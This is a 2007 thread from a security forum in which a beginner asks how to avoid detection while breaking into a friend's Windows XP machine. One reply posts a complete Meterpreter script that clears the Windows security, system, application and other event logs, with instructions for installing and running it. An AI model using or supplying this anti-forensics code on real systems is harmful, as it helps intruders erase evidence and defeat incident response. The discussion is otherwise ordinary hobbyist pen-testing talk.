The Ethical Hacker Network - Beginning Pen Tester

xXxKrisxXx

Hero Member

Offline

Posts: 512

Beginning Pen Tester

« on: December 23, 2007, 03:30:15 PM »

Sup Everyone?
Had a basic question or so was wondering if anyone could aim me in the right direction.
A buddy of mine and I have developed a small scheme to see which of us can access each other's computers first without any type of alarm triggering. I can bypass into his with his permission using an exploit in the Metasploit Framework however I'd like to be abit more stealthier. I dont have any custom scripts, but I was wondering, which files in a Windows Xp Machine should be deleted or cleared(Meaning Log Wise, Provide a path for me if you can) so when he looks through his logs, he wouldnt be able to tell I was Any advice would help guys thanks, and Happy Holidays.


	Logged

eCPPT, GCIH, OSCP, OSWP

boney

Jr. Member

Offline

Posts: 61

Re: Beginning Pen Tester

« Reply #1 on: December 24, 2007, 10:54:10 AM »

Hi KrisTeason,
Well i dnt have enough expertise on Metasploit, but regarding the logs, i guess it comes under the DataStore system called as LogLevel. You bhave to manually enable ths feature. The log files are stored in the directory of the user’s configuration directory ( /.msf3/logs).
Hope that helps.

happy holidays


	Logged

C|EH

All my life I wanted a computer...
Now I want my life back !

Kev

Sr. Member

Offline

Posts: 428

Re: Beginning Pen Tester

« Reply #2 on: December 24, 2007, 02:50:43 PM »

If you are just talking about XP, then its rather simple. On your own machine check out the Event Viewer by going to the control panel and then computer management. This will show you the normal default logging. Also check C:\WINDOWS\pfirewall.log for firewall logs, but this needs to have been activated by the user as do some of the other logging events in XP. The firewall log is activated under the advance tab once you click the firewall icon in the control panel.


	Logged

xXxKrisxXx

Hero Member

Offline

Posts: 512

Re: Beginning Pen Tester

« Reply #3 on: December 24, 2007, 04:03:23 PM »

Thanks for both your guys' responses. Thanks also to kev for providing that path to the firewall log. I was also wondering if there are anymore logs that could be cleare/deleted using the meterpreter, I'm trying to make sure my homie doesn't catch me here.


	Logged

eCPPT, GCIH, OSCP, OSWP

LSOChris

Guest

Re: Beginning Pen Tester

« Reply #4 on: December 24, 2007, 09:28:42 PM »

here's a meterpreter script to take care of it for you.

Quote

# clears ALL the event logs - chris [] learnsecurityonline [] com
#
# Event 517 is logged whenever the Security log is cleared, REGARDLESS of
# the status of the Audit System Events audit policy.

print_line("Clearing the Security Event Log, it will leave a 517 event\n")
log = client.sys.eventlog.open('security')
log.clear

print_line("Clearing the System Event Log\n")
log = client.sys.eventlog.open('system')
log.clear

print_line("Clearing the Application Event Log\n")
log = client.sys.eventlog.open('application')
log.clear

print_line("Clearing the Directory Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('directory service')
log.clear

print_line("Clearing the DNS Server Event Log (If It Exists)\n")
log = client.sys.eventlog.open('dns server')
log.clear

print_line("Clearing the File Replication Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('file replication service')
log.clear

print_line("Done... Have a lovely day :-)")


	Logged

xXxKrisxXx

Hero Member

Offline

Posts: 512

Re: Beginning Pen Tester

« Reply #5 on: December 24, 2007, 09:38:12 PM »

Thanks Gates, All I Need To Do Is Learn How To Put This Script Into The MSF, it'd be useful for someone to aim me that way, if it's not too much trouble Cheesy


	Logged

eCPPT, GCIH, OSCP, OSWP

LSOChris

Guest

Re: Beginning Pen Tester

« Reply #6 on: December 25, 2007, 07:54:22 AM »

well since its christmas...

http://www.ethicalhacker.net/content/view/136/24/

the script goes into your scripts/meterpreter directroy.

so for me its:

cg@segfault:~/evil/msf3/scripts/meterpreter$ pwd

/home/cg/evil/msf3/scripts/meterpreter

once you get it in your scripts/meterpreter/ directory you can invoke the script by running it within your meterpreter shell.

meterpreter> run clearalllog

there are some videos on EH.net an LearnSecurityOnline.com if you need some more help

-Chris


	Logged

xXxKrisxXx

Hero Member

Offline

Posts: 512

Re: Beginning Pen Tester

« Reply #7 on: December 25, 2007, 02:13:54 PM »

Thanks man,
You all have a good christmas. Grin


	Logged

eCPPT, GCIH, OSCP, OSWP

vital

Newbie

Offline

Posts: 4

Re: Beginning Pen Tester

« Reply #8 on: January 01, 2008, 02:36:50 AM »

Hello guyz,

How can i know my password if i forgot like in: yahoo account - all the details on my account was i forgotten, how can i retrieve it again, then the next is how can i retrieved again my password on my laptop windows XP and vista, administrator.

tnx guyz

L30


	Logged

proudindian

Newbie

Offline

Posts: 32

Re: Beginning Pen Tester

« Reply #9 on: January 01, 2008, 03:06:50 AM »

actually i dont think by metaexploit widout permission u cant break in2 his system..... Huh

?am i rite??


	Logged

LSOChris

Guest

Re: Beginning Pen Tester

« Reply #10 on: January 01, 2008, 07:11:03 AM »

Quote from: vital on January 01, 2008, 02:36:50 AM

i think you need to return that laptop to its rightful owner


	Logged

don

Editor-In-Chief
Administrator
Hero Member

Offline

Posts: 4168

Editor-In-Chief

Re: Beginning Pen Tester

« Reply #11 on: January 01, 2008, 01:35:46 PM »

... and don't hijack a legitimate thread.

Don


	Logged

CISSP, MCSE, CSTA, Security+ SME

Pages: [1] Go Up

« previous next »